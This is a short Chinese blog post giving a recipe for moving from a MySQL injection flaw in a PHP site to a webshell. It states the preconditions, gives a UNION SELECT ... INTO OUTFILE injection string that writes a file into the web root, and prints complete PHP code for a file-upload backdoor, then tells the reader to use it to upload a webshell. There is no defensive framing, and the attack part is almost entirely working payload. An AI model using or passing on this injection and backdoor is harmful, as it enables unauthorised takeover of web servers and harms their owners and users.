关于MySQL注入漏洞到获取webshell
2024-09-01 21:26:54
关于PHP网站报错性注入拿shell的方法,定位到报错在某个字段上的利用方式:
条件1: 爆出了网站的物理路径
条件2:MySQL具有into outfile权限
SQL语句为:
假如字段为2:
union+select+1,payload的十六进制,3,4,5+into+outfile+'/var/www/html/data/1.php';
payload:
<?php echo 'Uploader<br>';echo '<br>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload !!!</b><br><br>'; }else { echo '<b>Upload !!!</b><br><br>'; }}?>
访问1.PHP上传webshell即可。
最新文章
- SQL SERVER 多数据导入
- MyBatis Mapper.xml文件中 $和#的区别
- Python中list,tuple,dict,set的区别和用法
- 甲骨文推出MySQL Fabric,简化MySQL的高可用性与可扩展性
- Android程序架构基本内容概述
- memcached Logging
- WPF ItemsControl 控件支持鼠标滚轮滑动
- Flask学习记录之Flask-Mail
- Largest Rectangular Area in a Histogram
- 纯CSS实现点击事件展现隐藏div菜单列表/元素切换
- Java修饰符final总结
- 用于模拟百度分享的errno错误代码
- HTML5智能表单
- JS跨域ajax访问
- hexo博客pure主题解决不蒜子计数不显示的问题
- 《软件性能测试与LoadRunner实战教程》喜马拉雅有声图书上线
- 分布式队列celery 异步----Django框架中的使用
- C# 页面向controller中跳转匹配方法的时候,当controller中有两个重载方法时候,不发生跳转
- Tarjan+缩点【强连通分量】【模板】
- layer关闭当前窗口并刷新父窗口